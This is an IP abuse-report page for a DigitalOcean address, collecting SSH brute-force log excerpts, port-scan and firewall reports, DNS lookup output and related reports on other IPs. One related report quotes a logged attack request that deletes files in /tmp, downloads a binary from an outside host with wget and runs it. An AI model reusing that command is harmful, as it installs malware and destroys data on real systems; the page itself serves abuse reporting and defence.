162.243.4.134 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: DigitalOcean LLC

Hostname: unknown

Organization: unknown

Usage Type: Data Center/Web Hosting/Transit

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Jul 2 10:28:14 server sshd\[173755\]: Invalid user jun from 162.243.4.134 Jul 2 10:28:14 server sshd\[173755\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Jul 2 10:28:15 server sshd\[173755\]: Failed password for invalid user jun from 162.243.4.134 port 46660 ssh2 ...	2019-10-09 16:13:42
attack	fail2ban	2019-09-22 02:09:23
attack	Sep 12 13:38:34 hcbb sshd\[13723\]: Invalid user admin from 162.243.4.134 Sep 12 13:38:34 hcbb sshd\[13723\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Sep 12 13:38:36 hcbb sshd\[13723\]: Failed password for invalid user admin from 162.243.4.134 port 58450 ssh2 Sep 12 13:44:48 hcbb sshd\[14347\]: Invalid user admin from 162.243.4.134 Sep 12 13:44:48 hcbb sshd\[14347\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134	2019-09-13 08:10:59
attackbots	/var/log/secure-20190901:Aug 28 20:22:47 XXX sshd[39918]: Invalid user benjamin from 162.243.4.134 port 47842	2019-09-11 23:09:32
attack	Sep 2 00:17:13 vps200512 sshd\[15532\]: Invalid user life from 162.243.4.134 Sep 2 00:17:13 vps200512 sshd\[15532\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Sep 2 00:17:14 vps200512 sshd\[15532\]: Failed password for invalid user life from 162.243.4.134 port 33726 ssh2 Sep 2 00:20:52 vps200512 sshd\[15668\]: Invalid user zaleski from 162.243.4.134 Sep 2 00:20:52 vps200512 sshd\[15668\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134	2019-09-02 12:29:19
attack	Aug 31 02:26:01 aiointranet sshd\[12643\]: Invalid user bigman from 162.243.4.134 Aug 31 02:26:01 aiointranet sshd\[12643\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Aug 31 02:26:03 aiointranet sshd\[12643\]: Failed password for invalid user bigman from 162.243.4.134 port 54212 ssh2 Aug 31 02:30:19 aiointranet sshd\[13045\]: Invalid user wp from 162.243.4.134 Aug 31 02:30:19 aiointranet sshd\[13045\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134	2019-08-31 20:40:20
attack	Aug 25 10:10:58 herz-der-gamer sshd[15426]: Invalid user kpaul from 162.243.4.134 port 41728 Aug 25 10:10:58 herz-der-gamer sshd[15426]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Aug 25 10:10:58 herz-der-gamer sshd[15426]: Invalid user kpaul from 162.243.4.134 port 41728 Aug 25 10:11:00 herz-der-gamer sshd[15426]: Failed password for invalid user kpaul from 162.243.4.134 port 41728 ssh2 ...	2019-08-25 19:27:11
attack	Aug 12 06:46:30 * sshd[10038]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Aug 12 06:46:33 * sshd[10038]: Failed password for invalid user publisher from 162.243.4.134 port 48780 ssh2	2019-08-12 13:27:03
attack	Jul 19 01:59:41 plusreed sshd[21778]: Invalid user steam from 162.243.4.134 ...	2019-07-19 15:37:29
attackbots	Jul 18 08:24:51 plusreed sshd[8275]: Invalid user support from 162.243.4.134 ...	2019-07-18 20:32:27
attackspam	Jul 18 00:37:59 MK-Soft-VM5 sshd\[425\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 user=root Jul 18 00:38:02 MK-Soft-VM5 sshd\[425\]: Failed password for root from 162.243.4.134 port 39460 ssh2 Jul 18 00:42:27 MK-Soft-VM5 sshd\[452\]: Invalid user ubnt from 162.243.4.134 port 36824 ...	2019-07-18 08:48:23
attackspambots	Jul 7 13:37:28 MK-Soft-VM3 sshd\[21140\]: Invalid user keng from 162.243.4.134 port 52922 Jul 7 13:37:28 MK-Soft-VM3 sshd\[21140\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Jul 7 13:37:29 MK-Soft-VM3 sshd\[21140\]: Failed password for invalid user keng from 162.243.4.134 port 52922 ssh2 ...	2019-07-08 02:11:18
attackbots	Jul 2 06:17:06 localhost sshd\[16207\]: Invalid user dasusr1 from 162.243.4.134 port 53230 Jul 2 06:17:06 localhost sshd\[16207\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 ...	2019-07-02 15:42:26
attackspam	Jun 28 15:37:18 nextcloud sshd\[16600\]: Invalid user sang from 162.243.4.134 Jun 28 15:37:18 nextcloud sshd\[16600\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.4.134 Jun 28 15:37:19 nextcloud sshd\[16600\]: Failed password for invalid user sang from 162.243.4.134 port 32794 ssh2 ...	2019-06-29 05:35:43

Comments on same subnet:

IP	Type	Details	Datetime
162.243.42.225	attackbots	2020-09-25T18:49:09.3420041495-001 sshd[44787]: Invalid user frappe from 162.243.42.225 port 53566 2020-09-25T18:49:09.3450321495-001 sshd[44787]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 2020-09-25T18:49:09.3420041495-001 sshd[44787]: Invalid user frappe from 162.243.42.225 port 53566 2020-09-25T18:49:11.6215341495-001 sshd[44787]: Failed password for invalid user frappe from 162.243.42.225 port 53566 ssh2 2020-09-25T18:54:31.5499451495-001 sshd[44965]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 user=root 2020-09-25T18:54:32.6974861495-001 sshd[44965]: Failed password for root from 162.243.42.225 port 35548 ssh2 ...	2020-09-26 07:39:47
162.243.42.225	attackbotsspam	TCP (SYN) 162.243.42.225:50965 -> port 31302, len 44	2020-09-26 00:52:51
162.243.42.225	attackbots	Sep 25 08:42:46 jane sshd[8685]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 Sep 25 08:42:48 jane sshd[8685]: Failed password for invalid user git from 162.243.42.225 port 54698 ssh2 ...	2020-09-25 16:28:56
162.243.42.225	attackbotsspam	scans once in preceeding hours on the ports (in chronological order) 3684 resulting in total of 5 scans from 162.243.0.0/16 block.	2020-09-08 20:37:59
162.243.42.225	attackbotsspam	firewall-block, port(s): 3684/tcp	2020-09-08 12:31:05
162.243.42.225	attackspam	Aug 21 06:10:06 OPSO sshd\[23690\]: Invalid user tb from 162.243.42.225 port 56850 Aug 21 06:10:06 OPSO sshd\[23690\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 Aug 21 06:10:08 OPSO sshd\[23690\]: Failed password for invalid user tb from 162.243.42.225 port 56850 ssh2 Aug 21 06:15:28 OPSO sshd\[25370\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 user=root Aug 21 06:15:29 OPSO sshd\[25370\]: Failed password for root from 162.243.42.225 port 38184 ssh2	2020-08-21 12:20:26
162.243.42.225	attackspambots	Aug 20 15:21:33 PorscheCustomer sshd[20980]: Failed password for root from 162.243.42.225 port 56044 ssh2 Aug 20 15:24:43 PorscheCustomer sshd[21070]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 Aug 20 15:24:44 PorscheCustomer sshd[21070]: Failed password for invalid user rdy from 162.243.42.225 port 38754 ssh2 ...	2020-08-20 21:39:12
162.243.42.225	attack	srv02 Mass scanning activity detected Target: 31056 ..	2020-08-15 23:54:53
162.243.42.225	attackspam	Aug 8 05:58:40 debian-2gb-nbg1-2 kernel: \[19117568.050875\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=162.243.42.225 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=9172 PROTO=TCP SPT=52605 DPT=2969 WINDOW=1024 RES=0x00 SYN URGP=0	2020-08-08 12:52:35
162.243.42.225	attackbotsspam	Port Scan ...	2020-07-29 23:50:48
162.243.41.77	attackbots	TCP ports : 21412 / 29757	2020-07-29 18:32:23
162.243.42.225	attackspam	Fail2Ban - SSH Bruteforce Attempt	2020-07-27 19:37:41
162.243.42.225	attackspam	(sshd) Failed SSH login from 162.243.42.225 (US/United States/-): 5 in the last 3600 secs	2020-07-25 06:18:12
162.243.42.225	attack	Jul 24 00:09:02 inter-technics sshd[28962]: Invalid user ubuntu from 162.243.42.225 port 56316 Jul 24 00:09:02 inter-technics sshd[28962]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=162.243.42.225 Jul 24 00:09:02 inter-technics sshd[28962]: Invalid user ubuntu from 162.243.42.225 port 56316 Jul 24 00:09:04 inter-technics sshd[28962]: Failed password for invalid user ubuntu from 162.243.42.225 port 56316 ssh2 Jul 24 00:14:53 inter-technics sshd[29328]: Invalid user david from 162.243.42.225 port 41130 ...	2020-07-24 07:18:32
162.243.42.225	attack	odoo8 ...	2020-07-07 01:05:32

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 162.243.4.134
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41958
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;162.243.4.134.			IN	A

;; AUTHORITY SECTION:
.			3600	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019061702 1800 900 604800 86400

;; Query time: 3 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Tue Jun 18 20:44:02 CST 2019
;; MSG SIZE  rcvd: 117

Host info

Host 134.4.243.162.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 134.4.243.162.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
111.224.106.157	attackspambots	Port probing on unauthorized port 23	2020-07-09 06:01:15
170.106.67.55	attackspam	Unauthorized connection attempt detected from IP address 170.106.67.55 to port 1467	2020-07-09 06:18:37
93.61.136.40	attackspambots	Unauthorized connection attempt detected from IP address 93.61.136.40 to port 23	2020-07-09 06:02:59
78.187.32.8	attackbots	Unauthorized connection attempt detected from IP address 78.187.32.8 to port 23	2020-07-09 06:04:43
142.129.67.160	attackspam	Unauthorized connection attempt detected from IP address 142.129.67.160 to port 81	2020-07-09 05:58:09
212.29.202.114	attack	Unauthorized connection attempt detected from IP address 212.29.202.114 to port 445	2020-07-09 06:12:42
77.81.19.95	attack	Unauthorized connection attempt detected from IP address 77.81.19.95 to port 80	2020-07-09 06:24:24
176.254.10.25	attack	Unauthorized connection attempt detected from IP address 176.254.10.25 to port 8080	2020-07-09 06:17:38
187.177.83.252	attack	187.177.83.252 - - - [08/Jul/2020:22:42:03 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.45/beastmode/b3astmode;chmod+777+/tmp/b3astmode;sh+/tmp/b3astmode+BeastMode.Rep.Jaws HTTP/1.1" 404 162 "-" "Hello, world" "-" "-"	2020-07-09 05:53:17
37.61.242.102	attack	Unauthorized connection attempt detected from IP address 37.61.242.102 to port 445	2020-07-09 06:10:25
104.203.145.66	attack	IP 104.203.145.66 attacked honeypot on port: 1433 at 7/8/2020 1:02:01 PM	2020-07-09 06:01:40
68.39.92.163	attackspam	Unauthorized connection attempt detected from IP address 68.39.92.163 to port 22	2020-07-09 06:07:09
141.98.9.158	attack	Unauthorized connection attempt detected from IP address 141.98.9.158 to port 13078	2020-07-09 06:20:23
61.77.200.15	attackspam	Unauthorized connection attempt detected from IP address 61.77.200.15 to port 5555	2020-07-09 06:26:11
190.96.47.12	attackspambots	Unauthorized connection attempt detected from IP address 190.96.47.12 to port 445	2020-07-09 05:52:39

Recently Reported IPs

123.57.12.19	114.233.120.6	222.234.2.134	130.61.119.68
46.101.69.51	106.75.122.81	31.44.89.132	124.159.151.58
202.137.155.100	189.125.67.102	193.112.19.164	216.83.56.179
43.229.61.215	194.204.236.164	86.127.159.135	182.176.186.217
58.151.77.38	124.158.175.50	141.105.66.252	191.53.251.141